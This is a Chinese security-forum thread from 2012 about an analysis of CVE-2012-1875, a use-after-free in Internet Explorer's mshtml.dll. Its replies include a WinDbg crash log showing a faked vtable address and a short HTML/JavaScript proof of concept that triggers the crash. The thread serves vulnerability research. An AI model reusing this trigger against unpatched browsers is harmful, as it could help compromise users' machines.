[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

2012-6-17 23:13 9898

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

cscoder

2012-6-17 23:13

9898

挖洞这种同时考验内功和人品的事儿，对我来说还是太强人所难，所以我只能捡点纯体力劳动干干，趁自己还年轻，有膀子力气

调试了一番外国友人提供的POC，写了一点自己的理解和大家分享。文中纰漏之处，恳请各位看官斧正

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。

上传的附件：

CVE-2012-1875_MSHTML.DLL USE-AFTER-FREE漏洞分析.rar （111.26kb，552次下载）

收藏・8

点赞・3

打赏

最新回复 (19)
金罡雪币： 579 活跃值： (168) 能力值： ( LV6，RANK：90 ) 在线值：发帖 12 回帖 357 粉丝 4 关注私信	金罡 1 2012-6-18 11:03 2 楼 0 膜拜楼主的调试功底。
miaoling 雪币： 94 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 155 粉丝 0 关注私信	miaoling 2012-6-18 12:03 3 楼 0 mark，先顶后看
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 229 关注私信	riusksk 41 2012-6-18 13:42 4 楼 0 不错，下载学习下
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 2012-6-18 15:45 5 楼 0 看看先，厉害的人还是蛮多的
打狗棒雪币： 72 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 61 粉丝 0 关注私信	打狗棒 2012-6-18 16:31 6 楼 0 看作者的调试文档很给力，但是我重现场景不能触发呢？用文档中修改后的POC，貌似IE没加载mshtml模块啊？？
yiyiguxing 雪币： 70 活跃值： (64) 能力值： ( LV4，RANK：50 ) 在线值：发帖 34 回帖 258 粉丝 0 关注私信	yiyiguxing 1 2012-6-19 11:25 7 楼 0 K.K的功力越来越深
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-20 14:26 8 楼 0 下载学习谢谢分享
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 229 关注私信	riusksk 41 2012-6-20 23:38 9 楼 0 KK熟悉IE解析html的过程啊，求学习资料，各种函数调用这些，或者api文档，求科普
baixinye 雪币： 78 活跃值： (85) 能力值： ( LV4，RANK：50 ) 在线值：发帖 2 回帖 56 粉丝 5 关注私信	baixinye 1 2012-6-23 13:39 10 楼 0 IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测
hmonster 雪币： 180 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 23 粉丝 0 关注私信	hmonster 2012-6-23 18:57 11 楼 0 学习了，支持楼主
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 229 关注私信	riusksk 41 2012-6-23 19:07 12 楼 0 thx................
黑恋雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	黑恋 2012-6-25 15:34 13 楼 0 感谢楼主分享。什么好东东啊？
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 104 回帖 1065 粉丝 17 关注私信	天易love 18 2012-6-25 15:40 14 楼 0 100台电脑有几台能测试成功啊？这个版本的dll还能找到吗？抽象贴
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-25 19:43 15 楼 0 不会吧 ie8很稳定重现啊风水也很好命中稳定访问异常就是伪造的 vtable 1c1c1c7c (720.c68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0 eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!CElement::Doc+0x2: 68dbc402 8b5070 mov edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=???????? 0:005> uf mshtml!CElement::Doc mshtml!CElement::Doc: 68dbc400 8b01 mov eax,dword ptr [ecx] 68dbc402 8b5070 mov edx,dword ptr [eax+70h] 68dbc405 ffd2 call edx 68dbc407 8b400c mov eax,dword ptr [eax+0Ch] 68dbc40a c3 ret
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-25 19:48 16 楼 0 发个简化版 crash poc <DIV id=testfaild> <img id="imgTest"> <div id="imgTest"></div> <input id="4B5F5F4B" onMouseOver="crash();"></input> </DIV> <script language="JavaScript"> function crash() { eval("imgTest").src = ""; } function trigger() { var x =document.getElementsByTagName("input"); x[0].fireEvent("onMouseOver"); testfaild.innerHTML = testfaild.innerHTML; x[0].fireEvent("onMouseOver"); } trigger(); </script>
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 104 回帖 1065 粉丝 17 关注私信	天易love 18 2012-6-25 20:25 17 楼 0 请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8：上传的附件： ie8.png （28.16kb，91次下载）
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-25 21:42 18 楼 0 [QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8： [/QUOTE] 你的ie版本和楼主的倒是一样我的ie是for win7的所以版本号是8.0.7600.16385 按说这是个新漏洞只要近期没升级的低一点的版本应该都很难幸免可以windbg附加跑看看有没有什么异常
AntBean 雪币： 611 活跃值： (251) 能力值： ( LV12，RANK：390 ) 在线值：发帖 34 回帖 139 粉丝 4 关注私信	AntBean 9 2012-6-26 16:55 19 楼 0 我的ie 8 + window xp sp3 en 没重现出来，头大。。。
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 160 粉丝 0 关注私信	善良屠夫 2012-7-1 13:23 20 楼 0 先顶一个再学习
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

cscoder

发帖

回帖

230

RANK

关注

私信

他的文章

[原创]分享一个QuickTime静态分析IDAPython脚本

[原创]CVE-2012-1876 MSHTML.DLL堆溢出漏洞分析

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

[原创]Analysing the POC of CVE-2012-0769

[原创]Analysing the POC of CVE-2012-0003

关于我们

联系我们

企业服务

看雪公众号

最新回复 (19)
金罡雪币： 579 活跃值： (168) 能力值： ( LV6，RANK：90 ) 在线值：发帖 12 回帖 357 粉丝 4 关注私信	金罡 1 2012-6-18 11:03 2 楼 0 膜拜楼主的调试功底。
miaoling 雪币： 94 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 155 粉丝 0 关注私信	miaoling 2012-6-18 12:03 3 楼 0 mark，先顶后看
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 229 关注私信	riusksk 41 2012-6-18 13:42 4 楼 0 不错，下载学习下
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 2012-6-18 15:45 5 楼 0 看看先，厉害的人还是蛮多的
打狗棒雪币： 72 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 61 粉丝 0 关注私信	打狗棒 2012-6-18 16:31 6 楼 0 看作者的调试文档很给力，但是我重现场景不能触发呢？用文档中修改后的POC，貌似IE没加载mshtml模块啊？？
yiyiguxing 雪币： 70 活跃值： (64) 能力值： ( LV4，RANK：50 ) 在线值：发帖 34 回帖 258 粉丝 0 关注私信	yiyiguxing 1 2012-6-19 11:25 7 楼 0 K.K的功力越来越深
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-20 14:26 8 楼 0 下载学习谢谢分享
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 229 关注私信	riusksk 41 2012-6-20 23:38 9 楼 0 KK熟悉IE解析html的过程啊，求学习资料，各种函数调用这些，或者api文档，求科普
baixinye 雪币： 78 活跃值： (85) 能力值： ( LV4，RANK：50 ) 在线值：发帖 2 回帖 56 粉丝 5 关注私信	baixinye 1 2012-6-23 13:39 10 楼 0 IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测
hmonster 雪币： 180 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 23 粉丝 0 关注私信	hmonster 2012-6-23 18:57 11 楼 0 学习了，支持楼主
riusksk 雪币： 429 活跃值： (1875) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 166 回帖 2652 粉丝 229 关注私信	riusksk 41 2012-6-23 19:07 12 楼 0 thx................
黑恋雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	黑恋 2012-6-25 15:34 13 楼 0 感谢楼主分享。什么好东东啊？
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 104 回帖 1065 粉丝 17 关注私信	天易love 18 2012-6-25 15:40 14 楼 0 100台电脑有几台能测试成功啊？这个版本的dll还能找到吗？抽象贴
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-25 19:43 15 楼 0 不会吧 ie8很稳定重现啊风水也很好命中稳定访问异常就是伪造的 vtable 1c1c1c7c (720.c68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0 eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!CElement::Doc+0x2: 68dbc402 8b5070 mov edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=???????? 0:005> uf mshtml!CElement::Doc mshtml!CElement::Doc: 68dbc400 8b01 mov eax,dword ptr [ecx] 68dbc402 8b5070 mov edx,dword ptr [eax+70h] 68dbc405 ffd2 call edx 68dbc407 8b400c mov eax,dword ptr [eax+0Ch] 68dbc40a c3 ret
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-25 19:48 16 楼 0 发个简化版 crash poc <DIV id=testfaild> <img id="imgTest"> <div id="imgTest"></div> <input id="4B5F5F4B" onMouseOver="crash();"></input> </DIV> <script language="JavaScript"> function crash() { eval("imgTest").src = ""; } function trigger() { var x =document.getElementsByTagName("input"); x[0].fireEvent("onMouseOver"); testfaild.innerHTML = testfaild.innerHTML; x[0].fireEvent("onMouseOver"); } trigger(); </script>
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 104 回帖 1065 粉丝 17 关注私信	天易love 18 2012-6-25 20:25 17 楼 0 请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8：上传的附件： ie8.png （28.16kb，91次下载）
bitt 雪币： 435 活跃值： (1117) 能力值： ( LV13，RANK：388 ) 在线值：发帖 28 回帖 639 粉丝 18 关注私信	bitt 5 2012-6-25 21:42 18 楼 0 [QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8： [/QUOTE] 你的ie版本和楼主的倒是一样我的ie是for win7的所以版本号是8.0.7600.16385 按说这是个新漏洞只要近期没升级的低一点的版本应该都很难幸免可以windbg附加跑看看有没有什么异常
AntBean 雪币： 611 活跃值： (251) 能力值： ( LV12，RANK：390 ) 在线值：发帖 34 回帖 139 粉丝 4 关注私信	AntBean 9 2012-6-26 16:55 19 楼 0 我的ie 8 + window xp sp3 en 没重现出来，头大。。。
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 160 粉丝 0 关注私信	善良屠夫 2012-7-1 13:23 20 楼 0 先顶一个再学习
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复